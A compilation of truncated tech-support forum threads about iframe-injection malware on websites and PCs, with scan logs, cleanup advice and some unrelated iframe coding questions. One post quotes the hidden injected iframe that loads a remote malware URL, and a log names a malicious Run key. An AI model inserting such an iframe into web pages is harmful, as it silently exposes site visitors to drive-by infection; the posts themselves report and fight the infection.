If SDFix is unable to run after rebooting from Safe Mode, run SDFix in either Mode, and type F, then press Enter for it to finish the final stage and produce the report.
Please copy and paste the contents of Report.txt in your next reply.
Be sure to re-enable your anti-virus and other security programs before connecting to the Internet.
-- If the computer has been infected with the VirusAlert! malware warning from the clock and the Start Menu icons or drives are not visible, open the SDFix folder, right-click on either the XP_VirusAlert_Repair.inf or W2K VirusAlert_Repair.inf (depending on your version of Windows) and select Install from the Context menu. Then reboot to apply the changes.

RELEVANCY SCORE 38

Problem: I upload to websites from work, home, and satellite office. I installed Filezilla FTP program to upload to all three locations about 3 months ago. Mid-June, my websites started indicating they were virus-infected when opening them up through a browser. At work I have McAfee Anti-Virus and at home I use AVAST. The AVAST is telling me I have a Trojan HTML:IFrame-HY [Trj]. From what I have read with the Filezilla problem, the iframe injects into the index pages of a website. On my index.html page, it creates a frame or space that causes my page to appear jumbled. On the index.php pages of my company site, it causes a PHP error message (I have a php calendar and a php quiz).

I tried uploading over these (through my file manager online) and the errors came back. I went online through my webhost and opened the files up through the file manager, deleted the code and pasted in what I thought was good code for the php pages. I did see injected code on this page before I deleted it and made a copy of it. This seems to have worked for the php index pages but my index.html page is still throwing virus warnings - I can't see any injected code in that page.

From what I understand about the Filezilla, it doesn't protect the FTP passwords. I have another small website I work from home on and I deleted all of the files through the file manager online and uploaded what I believed to be cleaned files after changing my FTP passwords. When I previewed it in the bro...

A:trojan HTML:IFrame-HY

bumping

RELEVANCY SCORE 38

Hello,

Two days ago AVG's resident shield announced a chura virus when opening Firefox. I searched and found the line <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> in an HTML file just before the body closing tag. I made a search with Vista search (very slow) and found 59 HTML files with the same code in the same place. I scanned the computer with AVG and then with Anti-Malware, Ad-Aware and SUPERAntiSpyware. No way, they found just a few small problems that were taken care of. I removed that line of code from all files, but when I made another search there were over 150 infected files. I repeated the cycle (search, clean the files by hand, AVG and the others). This time AV and AS found nothing! I made a third search and now there were nearly 2000 infected HTML files. I can't clean so many files by hand, and from the previous experiences it was worthless because all the files I had cleaned were infected again.

I have a site and its files on my computer are now infected. I cannot access the site because I am sure to spread the virus all over and also distribute the virus to whoever visits. Not better is the fact that I save many files in HTML because I find it practical, so I have many HTML files. Even worse is that the infection is not on the start up HD with the OS where I could just reformat and reinstall or replace with a saved image, but on another HD where I have all my files and the site files. The C: disk has only ...

A:<iframe> chura virus

Hello Straydog,

In checking web references on the type of infection you posted here I see, as you probably have, a trail of discussions going back to perhaps March, and few with any direct confirmation of the infection sources, or complete solutions. However, in some of that web info I see references to "Virto" which is a form of the Virut file infector malware (see here). Virto/Virut injects its code into all of certain file types on systems, and is so pervasive and elusive in activities that the only best option for a solution is to reformat and reinstall, and all without saving any personal data from the system. If I were a site owner (and I am) and knew my system was infected with such a virulent malware (which has happened to one of my systems), I would reformat and reinstall, and regroup after as far as how to return needed settings and software etc. We can do some scan/checks here to see what all still needs cleaning, but up front, should there be any verification of Virto involvement I will end all assistance, with the correct suggestion of that reformat/reinstall solution.

For the website, send me via PM the site name, so I can evaluate its current status. Plan to only access that site from some other computer that is known to be malware free, and also has not been used before to access the site's web program (such as cPanel). From a different computer right now, change all control panel/site passwords. You can assume the site's security has been compromis...

RELEVANCY SCORE 38

OK, I've got an iFrame on a website and I want a link to open a new browser window from the page in the iFrame when it's clicked on so it doesn't take you away from the site.

_blank loads the entire page in the iFrame
_parent opens the entire page in the browser window that I don't want the person to be taken away from...

HELP!! It does this in both IE and Mozilla Firefox...

This one has me totally stumped!
 

A:Solved: iFrame problems

I believe "_new" should work.
 

RELEVANCY SCORE 38

Anyone know what line of code will give me the width and height of an inline frame? Please help, thanks. I want to make something size with the screen but can't.
 

A:detecting IFRAME size

RELEVANCY SCORE 38

I hit a website and the browser crashed. I noticed that things started acting wacky after that happened so I jumped on a Mac to look at the source of the page. I found someone had injected JavaScript that opened an iframe and redirected to an 81.x.x.x site in Panama. Here's the log. The scary line for me is: O4 - HKLM\..\Run: [xxy_Shell] C:\Documents and Settings\JDOE\xxy_rawv.exe

I've cleaned the files with McAfee but I'm not sure where to go from here other than wiping the drive. I also know exactly when it hit, so could I use the XP restore? Any ideas are greatly appreciated.

Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 3:46:07 PM, on 4/20/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
Boot mode: Normal

Running processes:
...

A:HJT log after iframe/redirect to Panama

Hi and welcome to TSF.

Apologies for any delay in replying, but we have been rather busy lately, and, of course, all our helpers are volunteers.

Since it has been a few days since you first posted, please follow these instructions if you still need assistance.

Download Deckard's System Scanner (DSS) to your Desktop. Note: You must be logged onto an account with administrator privileges.
Close all applications and windows.
Double-click on dss.exe to run it, and follow the prompts.
When the scan is complete, two text files will open - minimised > extra.txt and maximised > main.txt.
Copy (Ctrl+A then Ctrl+C) and paste (Ctrl+V) the contents of main.txt back in this thread (do not attach it).
Please attach extra.txt to your post.


To attach a file to a new post, simply
click the [Manage Attachments] button under Additional Options > Attach Files on the post composition page, and
copy and paste the following into the "Upload File from your Computer" box:
C:\Deckard\System Scanner\extra.txt

Click Upload.

I will monitor this thread for your reply.

Thank you for your patience.

RELEVANCY SCORE 38

I need help with this virus. Thanks

html/iframe.B.Gen virus

This virus is on my laptop.

I'm running Vista 64 bit.

A:i need help with this html/iframe.B.Gen virus

Welcome aboard

Download Security Check from HERE, and save it to your Desktop.
 * Double-click SecurityCheck.exe
 * Follow the onscreen instructions inside of the black box.
 * A Notepad document should open automatically called checkup.txt; please post the contents of that document.

=============================================================================

Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.
Make sure the following options are checked:
Internet Services
Windows Firewall
System Restore
Security Center/Action Center
Windows Update
Press "Scan".
It will create a log (FSS.txt) in the same directory the tool is run.
Please copy and paste the log to your reply.

=============================================================================

Please download MiniToolBox and run it.
Checkmark following boxes:
Report IE Proxy Settings
Report FF Proxy Settings
List content of Hosts
List IP configuration
List Winsock Entries
List last 10 Event Viewer log
List Installed Programs
List Devices (do NOT change any settings here)
List Users, Partitions and Memory size
Click Go and post the result.

=============================================================================

Download Malwarebytes' Anti-Malware (aka MBAM): http://www.malwarebytes.org/products/malwarebytes_free to your desktop.
 * Double-click mbam-setup.exe and follow the prompts to install the program.
 * At the end, be sure a checkmark is placed next to Update Malware...

RELEVANCY SCORE 38

I have had my website, by name padasalgi.tripod.com, for 11 years. Today when I tried to go to my site I am getting the following alert message, and connections to any files in this URL are disconnected. I am very much afraid, since the contents of my webpages could not be surfed by anyone due to this malware. I am quite new to malware/worms etc. I humbly request: will anyone please advise and guide me on how this malware virus could be removed? The details of the malware alert are as under:

avast! Warning
A Virus Was Found!
There is no reason to worry, though. avast! has stopped the malware before it could enter your computer.
When you click on the "Abort connection" button, the download of the dangerous file will be cancelled.
File name: http://padasalgi.tripod.com/\{gzip}
Malware name: HTML.Iframe-inf
Malware type: Virus/Worm
VPS version: 091227-0,12/*27/2009

I once again request everybody please help me in removing this virus.

RELEVANCY SCORE 38

I recently went to a website and my NOD32 came up with an Iframe.b.gen warning.
I immediately did a full scan on my computer and found nothing, but it would put my mind at rest if someone could have a look at my log files.

I ran gmer but the text files came up blank

.
DDS (Ver_11-03-05.01) - NTFS_AMD64
Run by Darren at 21:13:27.69 on 24/03/2011
Internet Explorer: 8.0.7600.16385 BrowserJavaVersion: 1.6.0_24
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.44.1033.18.6135.4461 [GMT 0:00]
.
AV: ESET NOD32 Antivirus 4.2 *Enabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
SP: ESET NOD32 Antivirus 4.2 *Enabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
...

A:Iframe.B.gen virus warning

Hello and Welcome to TSF.

Please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

I'm not seeing anything in your logs. We'll do an online scanner to check for remnants shortly.

------------------------------------------------------

Advanced SystemCare

We do not recommend the use of registry cleaners. Our colleague miekiemoes has an excellent writeup here

We suggest uninstalling them via Programs and Features in your Control Panel.

------------------------------------------------------

Please uninstall the following via Start->(or Computer)->Control Panel->Programs->Programs and Features if it still exists:

Coupon Printer for Windows<<Please read here

If you decide to uninstall it, also delete the following Folder if it still exists:

C:\Program Files\Coupons

------------------------------------------------------

Please run this online scan to help look for remnants. Ensure your external and/or USB drives are inserted during the scan.

In 64-bit Windows Vista/Win7, you must open the 64-bit IE browser.

Navigate to C:\Program Files (x86)\Internet E...

RELEVANCY SCORE 38

Problem: A couple months ago I somehow got some malware on my Mac at work (I don't know how because I don't go to "the sites you should stay away from", so I am guessing it was probably from some stupid ad banner). ANYWAY, when I logged into our website via FTP, a week later I noticed our website was blocked by Google (a client actually called us to tell us) and so I looked around to find the malicious script hidden iframe. The problem is it doesn't affect my Mac. I'm getting tired of removing the script from our website every other week, not to mention I have no idea what the effects are on a Mac and don't want to compromise other people's computers.

FTP Software: FireFTP
Mac OS: 10.4
Software tried: MacScan (did not detect any malware)

I am trying to take care of this without involving any money and unfortunately there isn't much "free" software out there for Macs or scanners.

Anyone know how to remove this? I am having the FTP passwords changed but I do not want to log back into the FTP only to have it happen all over again and then have to change our FTP passwords again.

Please help!
Thank you.

A:Mac and the iframe malicious script

You might have to wait awhile for a reply
I'm going to bring this to the attention of some people who should know
Hang in there

RELEVANCY SCORE 38

I am using an iframe for calling other websites. I want to disable right click in this iframe. Can anybody help me out with this?
 

A:Help! To disable right click in Iframe

It'll only work for people using IE and I think you'd have to disable it for the whole page and not just the iframe. Plus the IE user would have to have Javascript turned on for it to even work.

Other browsers have options to block you from doing evil stuff like that.

Also, keep in mind that for security reasons, browsers are very picky with what you can do with an iframe if the site loaded in it is not on the same server/domain as the page.
 

RELEVANCY SCORE 38

Hi, I'm developing a site that uses iframes for some of its features.
The problem is with the session variables. It seems that, if the "Always allow session cookies" from the "Advanced Privacy Settings" from IE privacy options is turned off, the session loses its ID, so the session values are lost from one page to another.
I'm trying to override that setting for this site only. Does someone know how?
Maybe some protocol or certificate, I don't know.
The use of iframes is out of discussion.

RELEVANCY SCORE 38

Hi Guys,

I've been suspecting that someone or something has hacked my computer, so I did a system scan with Panda ActiveScan and this has confirmed my suspicions. It seems these files are located in Outlook 2000.

I've been suspicious about this for a few weeks, but last night some of my clients were receiving email failed notices when trying to send me emails - one of them asked if I was using a BlackBerry phone and whether my emails were being redirected to this phone, to which I answered "no". Therefore it appears that whatever hacker tool is lurking in Outlook could be redirecting my emails to someone else. This is only my assumption and I would like someone to confirm if this is in fact correct.

Can someone help to remove all the hacking tools in Outlook 2000, and also the spyware that activescan has picked up.

I have attached the results of activescan and also a hijackthis log file. Both are attached in notepad.

Thanks.

Kind Regards,
Brian
 

A:Hacktool:Exploit/iFrame

RELEVANCY SCORE 38

I have Exploit-IFrame trojan on my machine.
I only encounter it when going to my own websites.
McAfee finds it and deletes it and shows me its location, I follow it and do not see the offending trojan, and the suffix changes each time it is found and cleaned both on the AOL and I.E. browsers.
I have run Ad-Aware SE Personal, AVG 7.5, and a complete McAfee scan - nothing found.

Step 1. None of the Malware listed, or Rogue programs exist on this machine.

Step 2. Run Panda ActiveScan.

Step 3. Downloaded and Installed Spyware Blaster from Desktop.

Step 4. I have SP 1 and 2 installed already.

Step 5. Downloaded Deckard's System Scanner to Desktop

Panda Activescan

Incident Status Location

Adware:adware/ncase Not disinfected c:\temp\FLEOK
Adware:adware/sidesearch ...

A:Exploit-IFrame trojan

dss.exe encountered a problem and had to close

RELEVANCY SCORE 38

I have run the ESET online scanner tool and it identifies the problem as HTML/Iframe.B.Gen virus and JS/Exploit.Agent.NHC trojan. The ESET tool never completes its scan. I have run Malwarebytes and Rogue Killer. Each removed some other malware but repeating those scans doesn't find anything now. PC is very slow. I have attempted to run CCleaner and it never completes its analysis when scanning for temporary Internet files. This is an office PC. QS1 and Integra/Docutrack are legit applications.
 
Thanks for any help provided. 
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 NETWORK
Internet Explorer: 8.0.7601.17514
Run by NSSUser at 8:48:44 on 2014-08-07
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3998.1045 [GMT -4:00]
.
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
...

A:HTML/Iframe.B.Gen virus

Hi there,

my name is Marius and I will assist you with your malware related problems.

Before we move on, please read the following points carefully.
First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
Perform everything in the correct order. Sometimes one step requires the previous one.
If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem.
Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
My first language is not English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

Please upload attach.txt as well and do the following:

Scan with Gmer rootkit scanner
Please download Gmer from here by clicking on the "Download EXE" Button.
Double click on the randomly named GMER.exe. If asked to allow gmer.sys driver to load, please consent.
If it giv...
